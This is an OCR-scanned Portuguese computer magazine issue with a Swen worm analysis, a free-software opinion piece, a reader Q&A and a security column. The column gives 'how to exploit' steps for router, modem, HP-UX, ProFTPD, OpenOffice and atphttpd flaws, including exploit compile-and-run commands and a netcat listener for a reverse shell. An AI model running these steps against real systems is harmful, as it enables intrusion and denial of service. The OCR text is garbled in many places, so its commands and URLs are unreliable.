Também é recomendável, para não 
dizer essencial, manter o Intemet 
Explorer atualizado, pois há variantes 
que exploram falhas antigas co browser, 
inatalando o virus automaticamente: 


suspeita: uma atualização ca Microsoft. 

Com um design similar ao da 
página da gigante do sofiware 
instruções de instalação no mesmo 
padrão dos boletins técnicos da 
empresa e com o próprio código do 
vírus simulando uma atualização real 
o Swen tem enganado não apenas 
usuários, mas até mesmo 
administradores de sistemas mais 
inocentes, Saiba agora como o virus 
funciona e evite este mico 


Reprodução 

Como já foi explicado, nas infecções 
por e-mail o Swen não explora nenhuma 
falha de segurança que permita a 
infecção automática, à exceção de 
alguns e-mails enviados que podem 
tentar explorar a falha no ActiveX do 
Intemet Explorer 5, resultando em uma 
infecção automática. Os endereços para 
envio são extraídos do Catálogo de 
Endereços, de e-mails e de arquivos 
diversos no sistema infectado, e as 
mensagens são enviadas por um cliente 
de SMTP embutido no próprio vírus. 

Note que o virus também envia 
outros e-mails contendo o seu 
conteúdo sem o disfarce de 
atualização da Microsoft, e alguns 
destes e-mails podem conter trechos 
de e-mails ou de arquivos de texto do 
sisterna infectado, o que pode tornar 
o e-mail convincente para O 
destinatário, além de representar uma 
ameaça à privaciciade do usuário do 
computador infectado 


Instalhng Update Pack 


Roll 
No 


Além disso, o virus tamoém 
pode se enviar para newsgroups, 
pastas compartilhadas na rede 
Windows, clientes de IRC e redes 
peer-to-peer como a do Kazaa. 

Caso haja drives de sistema 
mapeados na rede local, o Swen 
também pode tentar copiar-se 
diretamente para a pasta Startup do 
sistema-alvo, fazendo com que o 
vírus seja executado 
automaticamente no próximo boot 
do sistema atingido. 


Infecção 
Uma vez executado, o Swen 

copia-se com um nome de arquivo 
aleatório na própria pasta do 
Windows. A seguir, são modificadas 
diversas chaves de registro para 
ligar a execução do código 
malicioso à chamada de quaisquer 
arquivos com as extensões BAT, 
COM, EXE, PIF, REG e SCR. Com 
isso, o vírus garante a sua 

* execução não uma, mas múltiplas 
vezes conforme o computador é 
usado, o que torna desnecessária a 
presença ce qualquer entrada 
nas chaves de registro Run, 
RunOnce ou RunServices. 


Convencendo a c 


update which aliminates al known 
MS Outiook and MS Outlook Express. Install now to maintain the security of your 
computer from these vulnerabútias. 

neavim ich ralonear natrhas 


bmess turma E 


«» O e-mail e 


Capacidade Destrutiva 

O primeiro efeito da presença do 
Swen é um aumento maciço no 
tráfego de Intemet. O grande 
tamanho do executável (100 Ko), 
aliado às sucessivas execuções do 
virus. devido à sua estrutura do 
infecção, podem aumentar o tráfego 
de dados na Internet a ponto de 
tornar o acesso à rede impossível. 

Outro efeito colateral das múltiplas 
execuções do virus é uma sensível 
redução na velocidade geral do 
sistema, uma vez que todo acesso a 
qualquer arquivo com as extensões 
atingidas envolverá uma execução co 
virus. Para completar o estrago, o Swen 
impede o acesso ao Editor de Registro 
do Windows e também termina os 
processos dos softwares de antivírus 


ança a saltar do prédio 


o vírus vêm camuflados como uma atualização da Microsoft 


O Swen não é o primeiro nem será: 
o último virus do mundo a usar à 
engenharia social coma método de 
infecção. Para quem não sane, 
engenharia social é a arte de otiter 


tão eficaz quanto embededar o 


administrador ca rede a fim de 
consegur a sua senha de acesso. 
Metodos como este provam que um 
bom conhecimento da natureza hurrana 


e de segurança mais conhecidos 
tornando o computador mais vulnerável 
a ataques e outras infecções 


Como Remover 

Não é recomendada a remoção 
manual do vírus, uma vez que o processo 
envolve a alteração de um número grande 
de configurações do sistema sem o uso 
do Editor de Registro, que é bloqueado 
pelo vírus, além da complicação adicional 
do arquivo malicioso ter um nome 
aleatório e imprevisível. No entanto, caso 
o arquivo do vírus já lenha sido removido, 
é possível restaurar O acesso normal aos 
arquivos do sistema com o download e a 
instalação do arquivo fixswen.inf, 
disponível no link a seguir: 
http://a64 .g.akamai.net/7/64/2015/ 
2003-09-25-15-/download.nai.com/ 
products/m. 

O arquivo também é útil caso o 
antivírus utilizado tenha apenas 
apagado o arquivo, e não desfeito as 
alterações que o virus faz na 
configuração do sisterna. Vale lembrar, 
entretanto, que a solução recomendada 
é usar um antivirus capaz de fazer 
ambas as tarefas, já que isso torna o 


acesso não autorizado a computadores: ainda pode ser mais eficaz que as Apto fd 

ou redes alheias através de métodos mares brechas de segurança, é que 0 procedimento mais simples e, portanto. 
não-téonicos. E disfarçar-se de grande problema das redes de menos sujeito a erros. PEM 
atualização da Microsoft é certamente 


computadores ainda é o usuário. — — 


di Fome: Networ< Associates - www hai com 


7 Tutorial 


Eles sabem o 
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Dall 


caminho que deve ser 
seguido pela incúslria 
brasileira de tecnologia da 
informe (TI) é um tema 
em constanta discussão. 
Infelizmente, aos olhos do mundo, o 
Brasil não tem uma indústria de 
tecnologia da informação de grande 
visibilidade e isso atrapalha, e muito, 
qualquer iniciativa que se tenha para 
multar as exportações e o 
imulo à conquista de novos 
mercados. Ainda somos vistos pelo 


Ficha do autor 


E Nove 
Rodolfo Gobbi 


MR ESPECIALIDADE 
Diretor da 
Empresa pioneira am Linux 


Econtaro 


ocalto gobbichevetades com 


que falam. Todo mês uma superdica ou 


Diretor de operações da 
Cyclades defende a 
formação de uma 
força-tarefa para que o País 
adote o pingúim e use-o 
para se projetar ao mundo 


6 UNO 


resto do mundo como o país do 
futebol, do samba e da caipirinha 

O mercado interno brasileiro é 
pequeno para ganharmos 
competitividade no mercado 
internacional. Não dá para definimos 
qualquer caminho para a indúst 
brasileira de TI sem que 
consideremos ganhar parte do 
mercado internacional 

Enquanto, há anos, o Brasil 
discute qual caminho seguir, O 
mundo vive uma revolução 
silenciosa, persistente e sem 
grandes líderes mundiais: a 
revolução do software livre. E o País 
assiste ao nascimento de uma 
comunidade virlual sem precedentes 
na história da humanidade e com 
uma incrível capacidade de 
crescimento poucas vezes vista 
anteriormente no mundo 

Graças a isso, o software livre 
quebra paradigmas 8 o seu modelo 
de licenciamento traz consigo 


algumas vantagens muito. 
interessantes e. sobrstudo, 
competitivas em relação ao 
software proprietário; flexibilidade 
e independência tecnológica; 
eficiência, já que qualquer tipo de 
desenvolvimento não precisa 
começar do zero; apelo comercial, 
pois as barreiras de entrada no 
mercado são menores. 

Com o atual governo se 
apresentando mais nacionalista que 
os anteriores, multo tem se debatido 
sobre este assunto nas esferas 
governamentais e na mídia. 

Fala-se em criar uma indústria 
brasileira de componentes 
eletrônicos (chips), mas o momento 
é muito tarde e viria com um alto 
custo. Os ligres asiáticos já 
dominaram este mercado mundial; 
isso sem falar dos pesados 
investimentos necessários para este 
tipo de indústria, inviabilizando, 
assim, qualquer possibilidade de o 


Brasil vir a se consolidar como um 
lider mundial nesse segmento da 
indústria de TI 

Um outro caminho proposto é 
fortalecer a indústria nacional de 
desenvolvimento de softwares para 
que ela passe a exportar cada vez 
mais. Tarde novamente. Os 
programas do governo federal para 
estímulo à exportação de software 
vêm tentando este caminho há mais 
de dez anos, com resultados abaixo 
do esperado. A India está anos à 
nossa rente na formação de 
profissionais para este tipo de 
indústria. Novamente, uma 
alternativa que pode ser descartada, 
já que o cenário mundial nos 
deixaria apenas como um 
coadjuvante neste setor. 

O lugar ao so! do Brasil no 
mercado mundial de TI está ficando 
cada vez mais restrito e as cham 
de mostrarmos todo nosso 
potencial para o mundo estão « 
dia menores. Mas nem tudo está 
perdido. E não podemos perder o 
bonde mais uma vez 

Por 3 motivo, acredito que O 
Brasil precisa rapidamente se 
posicionar para o mundo como o 
lider em algum segmento na área de 
T;, qualquer que seja ele. Seja como 
o país das soluções de automação 
bancária, omo o país do 

“software livre ou outro campo 
qualquer. O mundo precisa 
lembrar-se automaticamente 
do Brasil quando tiver 
alguma necessidade 
tecnológica, assim como se 
lembra quando o assunto é 
futebol, camaval, samba 
ou caipirinha 

Assumir a bandeira do 
software livre não requer 
um investimento ce 
grande porte como a 


ida 


componentes 
eletrônicos, & 
nem mesmo 
precisaremos 
de longos 


prazos para conseguirmos os 
primeiros resultados financeiros. 
Essa alternativa tampouco requer 
um grande investimento de 
marketing para fazer a marca 
“Software Brasil" famosa. O software 
livre já é conhecido mundialmente. 
Meio caminho andado para as 
nossas pretensões internacionais 

O Brasil possui excelentes 
programadores, e muitos 
reconhecidos mundialmente 
Marcelo Tosatti, mantenedor mundial 
do Kernel do Linux, é um desses 
brasileiros que fazem sucesso 
lá fora, Potencial não nos 
faita. Basta nos 


posicionarmos como o 
pais do software livre e 
colocarmos na 
“memória do mundo” 
que quando 


soluções e serviços baseados em 
software livre, o Brasil 6 o pais certo 
para procurar e encontrar produtos 
com qualidade para atender a todos 
os tipos de necessidades 
Atualmente, todos os países em 
desenvolvimento procuram fortalecer 
sua indústria de TI para conseguir 
um lugar de destaque no cenário 
mundial. Se o Brasil não agir logo, ao 
invés de ficar apenas discutindo 
iremos perder mais uma excelente 
oportunidade de conquistarmos 
nosso lugar ao sol. Ficaremos 
assistindo a algum outro país 
assumir este papel em nosso 
ugar e mais uma vez 
perderemos o bonde 
das oportunidades que 
nos são criadas. Não 
podemos admitir 
ficar novamente 
para trás. PEM 


rimmaro Dos 


(é) Segurança 


Por Domingo M. Montanaro 


pe r(Qmontanaro.org 


Sistema Operacional: Conexant 


— — 
Tipo; Remota | Sistema Operacional: HPUX 
Versões Afetadas: | Access Runner Tipo: Local 

SMC2404WBR - Barricade Turbo | Versões Afetadas: B.11.00 

11/22 Mbps Wireless Cabe/DSL | Versões Afetadas: 3.21 Gravidade: Alta 

Broadcast Router Gravidade: Alta | Privilégios: Elevação de Privilégios 
Gravidade: Alta Privilégios: Acesso à área 


Privilégios: Serviço indisponível 


Descrição 

O SMC2404WBR Barricade Turbo 
11/22 MBPS Wireless Cable/DSL 
Broadcast Router é um roteador 
utilizado em conexões 
Wireless/Cable/DSL. Com ele, é 
possível congelar o equipamento 
até o usuário intervir com um 
reboot. Isso ocorre porque existe 
uma falha na prevenção de 
inundação de pacotes UDP 
randômicos, fazendo com que o 
aparelho seja vulnerável a esse tipo 
de ataque de negação de serviço 


Como Explorar: 

Para explorar essa vulnerabilidade, | 
é possível utilizar o mesmo exploit 
utilizado para indisponibilizar o 
firewall ZoneAlarm na plataforma 
Windows 98. Para tal, use: 


perl sms.pl endereço ip 


| 
Como Proteger: 
Até o fechamento desta edição, a | 
correção não estava disponível. | 
Procure no site do fabricante. | 

) 


administrativa sem possuir a 
senha de administrador 


Descrição 

O Conexant Access Runner DSL 
Modem é utilizado para conexões 
ADSL com a Internet em diversos 
países do mundo. Em sua versão 
de firmware 3.21, é possível 
acessar a área administrativa sem 
possuir a senha de administrador. 
Isso deixa qualquer sistema 
extremamente vulnerável. 


Como Explorar: 

Uma vez visualizada a tela de 
login, digite qualquer string e 
confirme. Após aparecer tela de 
acesso negado e senha incorreta, 
retorne à tela de login escolhendo 
a mensagem please try again. 
Após isso, simplesmente aperte 
<Enter> e, assim, você entrará 
na área administrativa 


Como Proteger: 

Até o fechamento desta edição o 
problema ainda não tinha sido 
sanado. Procure no site do 
fabricante para mais informações. 


Descrição 

O ctprintinfo é uma aplicação 
gráfica que exibe o status de filas 
de impressão e trabalhos de 
impressão. Em sua versão para o 
HPUX B.11.0, ele possui uma 


| falha de buffer overflow na 


verificação da variável de 
ambiente DISPLAY. 


Como Explorar: 
Para fazer um teste se sua 
versão é vulnerável, siga os 
seguintes passos: 


export DISPLAY ="" perl -e “printf 
"A x9ITT 
/usr/dt/bin/dtprintinto 


Caso apareça uma mensagem 
Memory Fault, seu sistema está 
vulnerável a ataques. 


Como Proteger: 

Até o fechamento desta edição a 
HP ainda não havia lançado o 
boletim oficial com a correção da 
falha. Procure no site da empresa 
para mais informações sobre 
como corrigir o problema. 


prorren 


Sistema Operacional: Posix Sistema Operacional: Vários 
Tipo: Remota Tipo: Remota 

Versões Afetadas: 1.2.7 até 1.2.9rc2 Versões Afetadas: 1.1.0 
Gravidade: Alta Gravidade: Média 


Privilégios: Execução de comandos 
arbitrários 


Privilégios: Indisponibilização do 
Aplicativo 


Descrição 

O ProFTPD é um daemon (servidor) 
FTP muito utilizado hoje em dia, em 
detrimento das falhas de segurança 
do concorrente, WU-FTPD. Em 
sua configuração, é possível fazer 
um chroot jail, ou seja, uma jaula, 
para que o usuário não possa 
visualizar ou manusear arquivos fora 
de sua pasta-base. Nessa versão, é 
possível quebrar essa chroot 
através de uma falha de buffer 
overflow que possibilita a execução 
de comandos arbitrários. 


Como Explorar: 

Primeiro, certifique-se de que o 
host remoto está rodando a versão 
específica do proFTPD. Para isso, 
é necessário apenas conectar pelo 
próprio cliente nativo ftp do seu 
sistema operacional. Uma vez 
certificada a versão, compile e rode 
o exploit proft put down.c. 


S$gec -o proft put down 
proft put down.c 
S./proft put down -t 
endereço ip da vitima «| 
endereço ip local -U 
incoming 


incoming é o diretório que vai ser 
criado e onde o exploit vai 
trabalhar como pasta-base. 
Informe seu endereço IP para a 
shell conectar. Para abrir uma shell 
local, use o NetCat 


$ ne nl 4660 


Como Proteger: 
Baixe a versão 1.2.8p que já está 
corrigida no site www.proftpd.org 


Descrição 

O OpenOffice é um pacote de 
software para escritório similar ao 
Microsoft Office. Quando 
habilitado o acesso remoto ao 
aplicativo, ele abre a porta 8100 
por padrão, ouvindo por conexões 
remotas. Nesse modo remoto, 
existe uma falha que possibilita 
um erro fatal no aplicativo, e assim 
fechá-lo remotamente. 


Como Explorar: 

Abra o OpenOffice habilitando o 
acesso remoto na sua própria 
máquina com o comando: 


soffice - 
accept=socket,host=Seu endereç 
o IPport=8100;urp; 

Agora, efetue uma conexão local 


no endereço de loopback através 
do comando 


telnet localhost 8100 


Irá aparecer 


Digite aproximadamente dez 
vezes a sequencia “O <enter>" de 
maneira que fiquem dez linhas do 
número zero. Após isso, a 
aplicação mostrará uma 
mensagem de erro e 
posteriormente fechará 


Como Proteger: 
Desabilite o acesso remoto até 
que a falha seja corrigida 


a = = 


Sistema Operacional: Linux 

Tipo: Remota 

Versões Afetadas: Todas até 0.4b 
Bravidade: Alta 

Privilégios: Elevação de privilégios 


Descrição: 

O atphttpd é um servidor Web 
desenhado para ser simples, 
rápido e, especialmente, para ser 
utilizado em sistemas que não 
podem acessar muitas vezes o 
disco rígido. Em sua versão 0.4b, 


| ele possui uma falha de buffer 


overflow que possibilita ao 
atacante obter os privilégios do 
usuário que roda o atphttpd, 
normalmente root 


Como Explorar: 

Para explorar essa vulnerabilidade, 
certifique-se que o host remoto 
está rodando o atphttpd, fazendo 
uma conexão na porta HTTP 
(normalmente 80). Verifique se o 
programa está sendo executado 
com o seguinte comando: 


*telnet endereço servidor 80 


Se estiver correto, irá aparecer a 
instrução GET / HTTP/1.1. Após 
isso, compile e rode o exploit: 


S gee -o atphttp atphttp.c 
«/atphttp endereço ip vítima 
OffSet 


Normalmente, o Offset varia de 
1.300 a 2.400, dependendo da 
distribuição. Sugerimos tentar 
ofísets de 100 em 100. 


Como Proteger: 

Até o fechamento desta edição 
não estava disponível a correção 
para esse problema. Procure na 
página do fabricante a última 
versão do servidor em 
http:/Muw.redshift.com/—yramin/ 
atp/atphitpd/ 


Famiíli 
LINU 


Participe de um grupo de usuários Linux. No 
Brasil, existem dezenas deles para você trocar 
experiências e saber mais sobre o sistema 
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Pará 
brgroups,yahoc.com/group/linampoidegua 


oesinar inurpagrupos com.br 


Grupo GNU/Linux do Pará 
hHpo//groupo, morar vyotoro 


& UI 

Portal do Piauí 
war linuxpl ne 

4. CEARA 

Linux-CE 
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utm.br/ servicos sta discuss html 
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lupa 
hugy alisisyahocgrupoi. com.br 
AHIA, 
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8): MINAS GERAIS 
Linux BH 

veda intibiN org 


Grupo de Usuários Linux da Bahia 


ama comunista dalinur com gr 


GNU LinudyG 
fecibrsalro net Linux 


BG 
ave inibe 


Grupo de Lisuários Línivx do Brasil 
sa rei rolenh, com. br/ = bulk 
dragons/opSe html 


9): ESPIRITO 
de Umulrios 
do Santo 


Vi Mirim 


GU Linux do Espirito Santo 
asia. ng br 


40 - RIO DE JANEIRO 
Linux Racondo 


Gato 


Miriam rider mitose: Ie Degraus quam 


ova ti ur | br 


onverse sobre Linux com 

outros usuários, São milhares 

espalhados em diversos 

grupos, Todos eles com um 
nleresse em comum: ampliar 
conhecimentos sobre o sistema 
Operacional qua vem conquistando 
mais espaço a cada dia. 

E para que você possa fazer 
parte deste universo, publicamos, a 
seguir, uma lista de vários grupos 
de usuários Linux brasileiros. Basta 
escolher um deles e fazer O 
cadastro para ficar por dentro de 
todas as últimas novidades 


Jar 
wa linuxnangar hpg.com,br 


SERVUX - Servick 
WA. Servux.cjb.net 


LPI-BR 


br.groups.yahoo.com/group/lpi 


Limwebr 


linux-br.conectiva.com br 


LUG-RIO Linux User Group 
ia gripes ie e rugas gl 


LUG Patrápolia 
Win grupos com br/grupos/Tug-patropalis 


11 SAO PAULO 
ThoBSD 
waves, org 


Lirmul 
nuscunosp br 


TUCANOS - GNU/Linux User Group 
hEp://brgroups yabos.cami greup/tupanes/ 
GUUB Linux de Biologia/USP 

rn ira 

LinuxSP 

vendo inuiaap or br 


JundLinux Grupo de Usuários de Linux de Jundiaí 


re Julian oro 

Fiz! Comunidado Linux de Matão 
Miro prescapssarim tt 
Comunidade Linux 

wram comlintis com.br 


LinueForce 
Brgioups yshvacom/groupmistorce 


12: UNA, 
Gg da mb La 
de Antônio da Pimtina 


rio ul no 


Prog-BA - Pros ação Linux 
listas.conectiva.com briistas/ 


JuetLinux 
groups:yahoo.com/groupjustlinux 


GUS — Grupo d 


5 Slackwaro 


Usuário 
gus-brlinuxmag com or 


Grupo di são Linux 
groups yahoo com/graupilinux-board 


Linuxabo 
linuxebe-subscribr 


groups.com 


Rod Hat Linux Bi 


rechatbrasil-subscribe(Oyahoogrupos.com.br 


Deblan-BR 
www debian-brorg 


LinuxChix Brasil 
brlinuxcnix.org 


Linux Debate 
WWW. grupos.com.br/grupos/linux 


ança no Conectiva Linux 
distro consctiva.com,brimallmary 
listinfo/seguranca 


Lines de Curitiba - PR 
vimvilinunorcentor sjb.not 


LinxSC (GULSC) 
wiwvidoroups.com/grovpa/linutac 


ASPABRASILIA 
tips? prio om br 
* grupos / soul 


 relrsiação 
Http://r aroDe yahoo comeu 
“nanconadt 


epa 


vem nur 


GU Linux da Erechim 
wine gencitias:com/guislinux 


GNUToan do Usuários 
Lino de 
ave rutser, hoo dg com.br 


Jo Vaio do toquem os 


vas apoteose 
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Linus Lands 
Eretp:o)/ Dr groups. yahoo group Iundanto 


Grurias 
Bete? mori inariç ra bar 


Projeto Software Livre RS - www.softwarelivre.org 
O Projeto de Software Livre de RS acaba de se tornar uma ONG, 
a Associação SoftwareLivre.org. Dentro dessa estrutura, 
pretendem adicionar os diversos PSL espalhados pelo País, 
torhando-se um portal com Informações sobre os eventos. 


UnuxAll org vo à Produção 
wwwlinuxallorg - Edson Syguedorm 


webimastenálinual org 


www cipsga org.br 


Linux na Redi 
http; linuxnarede.org/ 


Linux Anta Disponibilidade 
linux-ha-be-sulseribea)hazar conectiva.com.br 


Linux Clube 


wwwelinuxolubo com 


Un 
ww linuxdicas.com.br 


' f Grupo Geek 
wamwlhebsd.org 


Elm do Pot mito 
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Aqui, os especialistas da Utah Linux Center 
acabam com suas dúvidas sobre Linux. Envie 
sua pergunta para 


Atualização do Red Hat 9.0 RADARES RE sao 
Como devo proceder para 
fazer a atualização do Red Hat 9.0 


sendo que a atua : Nou for the First time ever, information, updates, and servioss 

automática não está funcionando? that enhance the security and reltabilitu of vour Red Hat Linux 

Aparentemente, o problema systems are available to you in one place Red Hat Network. 
tar no sito da Red Hat rasa ao ia ana ri 


O que devo fazer para não manter — Red Hat Linux information, updates, and services specífic to 
meu sislema desatualizado? uour systems E q E 

Sergio Signal — gr es io proactive delivery of updates (including the 

ssignal(Dig.com.br — The latest neus from Red Hat uhen neu products and servicos 


ter with Red Hat Network 


parece 


A distribuição Red Hat Linux 
possui um esquema proprio para 
alualização. Tr 
Red Hat Network, ou RHN. Antes 
jo, é necessária 
lastrar-se como usuário do 
serviço. O cadastro pode ser feito 
de duas maneiras; através do site 
http./irhn.nredhat.com ou com o 
auxilio do utilitário rhn register. 
Após cadastrado, as atualizaçõ 
podem ser aplicadas utilizando-se download ace 
o utilitário upedate. Ambos os servidores. Opcionalmente, a Red Hat Linux com Samba. No entanto, o Novell 
utilitários rhn, register e up2dale oferece um plano de assinatura em que o mítia a gravação nos arquivos e 
estão incluídos por padrão no usuário paga uma taxa e fem acesso a impecia deletar arquivos, o que é 


CAlt-TadD beturen elements | Space) sel 1 <FIZ> next soreen 


Registro no up2date do Red Hat é obrigatório para a atualização do sistema 


S controlada para permitir velocidades de Novell por Linux 
eis e não salurar Os Substituí um sistena Novell por um 


Red Hat Linux servidores FTP exclusivos, com largura de impossível no Samba, Uso um ema 
e trata de um serviço que banda mais ampia e garantia de em Dataflex para DOS, e no Linux 
não envolve custas diretos para O funcionamento ininterrupto. Para quer culoguel permissões nwx para O 
jo final, a quantidade de utiliza o Linux profissionalmente, como, por usuário, rwx para o grupo e rx para ns 


joaa's simultâneos nos exemplo, em servidores de Intemet, é uma — outros usuários. Desta forma, o usuário 
servidores FTP da Red Hat é excelente altemativa utilizar a opção paga. dono do arquivo e o grupo poderiam 


Ê 7 Não perca a oportunidode 
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O grub é um dos gerenciadores de Inicialização da distribuição Conectiva 9.0 


ter todos os acess: 


s, & aos demais 
seria permitido apenas a leilura e 
execução, Ássim, qualquer usuário 


executaria O prog te que faz 
parte da grupo teria acesso à gravação 
Tudo isso teria funcionado se o 
programa fosse executado no servidor, 
mas ele é executado no terminal, 
pois o Samba serve apenas para 
armaz rquivos. faço 
para permitir que os usuános executem 
DS programas armazenados no 
servidor, e estes consigam usar os 
arquivos de dados, efeluando 
gravações, sem permitir que o usuário 
entre pela rede e apague todos os 
Arquivos & programas ? 


enar O! 


Luis Saran 
luis.garanPbol.com.br 


ma existente no 
Unix usado pela 
o do Kemel 2.6, 
de 


teremo: jporto 
controle de acesso) até então 

existentes na forma de pato ches para 
Kermeis da série 2 


que você pode tentar é usar a 
permissão especial "", Trata-se do 
sticky bit Quando definida para 
clretórios, ela permite que os usuários 
pt im gravar no diretório caso tenham 
permissão de gravação, mas não 
permite que apaguem arquivos de 
outros usuêrios. Simplificando, somente 
o dono de um arquivo pode apagá-lo. 

O sticky bit é ativado com o uso € 
comando a seguir 


chmod +t <diretório= 


Linux não inicia 
Instalei o Conectiva 9 no mesmo 
HD do Windows, cada um na sua 
partição, Ao Instalar o Windows 
novamente, sumiu a tela de inicialização 
do Linux, onde eu escolho o Linux ou 
Windows. Como faço para ativar 
novamente esta tela de inicialização 
sem instalar o Linux novamente? 
Dalton FG 
daltonfg hotmail.com 


O Conectiva 9 usa o GRUB como 
gerenciador de boot padrão para 
controlar a inicialização do Linux e de 


outros sistemas operacionais 
instalados ern sua máquina 
(Windows, por exemplo). O GRUB 
provavelmente toi instalado na MAR 
(setor de inicialização-mestre) de 
seu disco rígido. O que aconteceu 
foi que o Windows, ao ser 
reinstatado, apagou o conteúdo da 
MBR de seu disco rigido e, 
consequentemente, removeu o 
GRUB. S stema Conecti 
continua instalado e intacto, você 
somente não consegue acessá-lo 
devido ao GRUB não rmais ser 
exibido quando seu PC é iniciado. 
O que você pode 
usar o dlisquete de re: 
criado durante a instalação do 
Conectiva 9 e iniciar sua máquina a 
partir dy mesmo. AO fazer isso, sua 
máquina será iniciada no Conectiva 
uma vez dentro do mes 
poderá regravar o GRUB na MBR 
novamente, exocutando o comando 
abaixo como root (superusuário): 


grub-install /dev/hda 


Caso você não possi 
disquete criado durante 
instalação, tente 
máquira alravés du CD de 
instalação do Conectiva 9 e, no 
momento em que surgir a tela 
gráfica do GRUB com as opções 
stalação do Conectiva, 
fique se uma opção de 
recuperação de instalações 
danificadas existe (geralmente 
identificada como recuperação ou 
rescue). Caso tal opção exista, 
escolha a mesma, espere até que o 
acesso a um prompt de comandos 
seja disponibilizado e execule a 
instalação do GRUB como indicado 


anteriormente, ou seja, através do 
comando grub-install 


Faça parte da comunidade que MAIS CRESCE 
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Storage USB no Linux 
Tenho um dispositivo de 
armazenamento externo que é 
conectado na porta USB. No Windows 
XP simplesmente conecto o 
equipamento no computador para que 
ele seja reconhecido automaticamente, 
No Linux isso não acontece. O que é 
preciso fazer no Linux para que esse 
periférico seja reconhecido no sistema? 
Gabriel Moraes 
Via Internet 


Esse tipo de armazenamento é 
normalmente reconhecido pelo 
sistema Linux, No Windows XP a 
opção de storage já está 
habilitada, diferente do Linux, que 
precisa iniciar manualmente, Para 
isso, 05 comandos a seguir 
devem ser execulados nos 
sistemas Linux que estão com 
suporte USB habilitado 


* modprobe úsbuhal 


Curi os rrúdulos carregados, 


Mensagem de erro 
Sempre que desconecto o cabo 
de rede ou desliga o roteador, o 
computador mostra uma mensagem 
de erra informando que o cabo da 
rodo está desconectado. Como 
posso desabilitar essa opção? 
Matheus Garcia 
Via Internet 


Acesse o sistema como 
administrador. Em seguida, clique no 
botão Iniciar & no menu suspenso 
escolha Propriedades. Na janela 


monte com o seguinte comando: | 
* mount -=t vfat /dev/adal Zmnt 


Note que a montagern é parecida 
cum a de uma partição. Depois de 
montado, acesse o diretório /mnt. Se 
desejar saber a capacidade do 
dispositivo, digite o comando: 


* dh 


E na linha de comando /dev/sda1 
você encontra as informações sobre O 
hardware utilizado. 
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e informát 


estas opções encontradas nesse 
menu, você altera o comportamento 
da icone na barra de tarefas, incluindo 
as mensagens de erro, Para 
desabilitá-lo, escolha a opção Sempre 
Ocultar. Assim, todas as mensagens 
desses icones serão desativadas. 


Desktop Virtual 
Faz pouco tempo que comecei à 
usar O Linux e existe uma opção nos 
Gerenciadores de Janelas que não 
existe no Windows, que são as 
chamadas Telas Virtuais. Existe algum 
programa que faz a mesma 
função para o Windows? 
Alissa Moraes 
Via Internet 


Os recursos de telas virtuais 
são exclusivos do gerenciador de 
janelas, e não do sistema. No 
Windows, existe um programa que 
faz a mesma lunção, chamado 
Cool Desk. Faça o download no 
site (www shelitays. com). Para 
instalar o programa, é muito 
simples. Clique no botão Next err 
todas as janelas alé concluir a 
iristalação. Com o programa 


Windows possui tela virtual similar à do Linux 


Propriedades, clique na aba Barra de 
taretas Nessa categoria, você 
encontra a opção Ocultar icones 
inativos. Se estiver desabilitada, ative-a 
marcando a caixa de seleção. Ao lado 
dessa opção, você encontra o botão 
Personalizar. Clique para abrir uma 
nova janeia. Nessa janela, Incalize à 
item Conexão Local, Ao lado dessa 
opção, você encontra uma lista de 
opções em um menu suspenso. Com 


instalado, chque no menu Iniciar, 
Programas, Cool Desk e, em 
seguida, Gool Desk novamente. Para 
altorar as telas virtuais dentro do 
Windows, pressione as teclas CTAL — 
SHIFT + nº (1-9) simultaneamente. 
Por padrão, são habilitadas trés telas 
virtuais, mas as opções podem ser 
recontiguradas. Para alterar, clique 
com o botão direito do mouse no 
icone do programa que fica próximo 
ao relógio do Windows e em seguida 
escolha Settings. PCM 
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Módulo Triplo Horizontal — 18em x 3,7em 
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A lógica da feitiçaria 


Para que se veja a quantidade de suor que escorre por trás de cada mágica 


Por Leandro Calçada 
leandro.calcadaeuropanet.com.br 


ilhares de anos de 

evolução pessoal e 

tecnolágica não mudaram 

um fato. À humanidade 
ainda acredita em mágica, À 
evolução das ciências e da 
tecnologia, aparentemente 
antagônicas da magia e do 
sobrenatural, não só toi incapaz de 
eliminar a magia como a fortaleceu, 
Pense no computador, por exemplo. 
Se há algo que aprendi sobre as 
pessoas nestes meus 11 anos de 
informática foi que o computador é 
e sempre foi visto, coma uma 
espérie de caixa mágica. Ao 
programador, consequentemente, 
coube o papel de mago, 

É fácil perceber por que isso 
acontece, O computador, como 
toda tecnologia complexa, 
depende de uma grande 
quantidade de conhecimento, e 
poucas pessoas estão disposlas a 
adquiri-lo, À primeira vista, pode 
parecer uma espécie de estupidez 
coletiva ou decadência 
científica, mas não é, O tato 
é que o computador não é a 
única tecnologia que 
exisle, nem a única área 
do conhecimento a ser 
explorada. Há muito para 
ser aprendido, muito a 
se conhecer. e no fim 
cada grupo profissional 
fica com a sua cota 
ce especialistas, todos 
carentes e indignados 
pela falta de 
atenção que o 
mundo dá à sua 


área de interesse preferida. 

Aus programadores não se 
reserva uma sina diferente. Não há 
mês sem que algum colega de 
trahalho passe pela minha mesa o 
comente, Incrédulo, sobre a minha 
incrível capacidade de entender esse 
monte de lexto grego que se espalha 
na minha tela, e como não esqueço 
este monte de palavras e regras 
estranhas. Sinto-me tão especial que 
meu ego nem cabo na sala, O fato 
de que o autor do elogio entende & 
faz coisas que não conheço nem sou 
capaz de compreender não importa. 
Eu sou o mágico. Isso sem falar nos 


pobres gregos que, de tão 
inteligentes, nem precisam estudar . 
para aprender a falar... grego. 

Mas é claro que essa carícia no 
ego tem o seu preço. É difícil dar 
valor a um lrabalho quando as 
pessoas não vêem nele senão uma 
extensão natural da sua habilidade 
“Ele tem dom pra isso”, dizem, como 
se isso explicasse tudo, e esperam 
que a solução para todos os 
problemas brote de nossos dedos 
mágicos, como se programadores 
fossem alguma classe especial de 
seres humanos projetada para lidar 
com computadores, Nestas 
condições, precisar de tempo para 
o trabalho é um luxo, e cobrar por ele 
então, uma verdadeira heresia 

Só que essa injustiça não é 
exclusividade dos programadores, 

Humanos mistificam tudo 0 que 
não entendem e, por tabela, 


todos que lrabalham com o que 
não se entende, Nossos 
mecânicos encontram defeitos 


nos carros com um simples & 
rápido olhar, enquanto médicos 
nos curam no primeiro diagnóstico 
e pedreiros levantar) paredes 
inteiras sem qualquer sinal de 
cansaço, Secretamente 
invejamos seus poderes 
mágicas, sua capacidade 
sobrenatural, seus 
trabalhos perfeitos, sem 
) perceber o suor sob o 
pedreiro, os manuais na 
mesa do mecânico, ou os 
livros na estante do médico, 
Se eles não aprenderam a 
programar, certamente 
deviam estar ocupados 
com alguma outra 
coisa PEM 


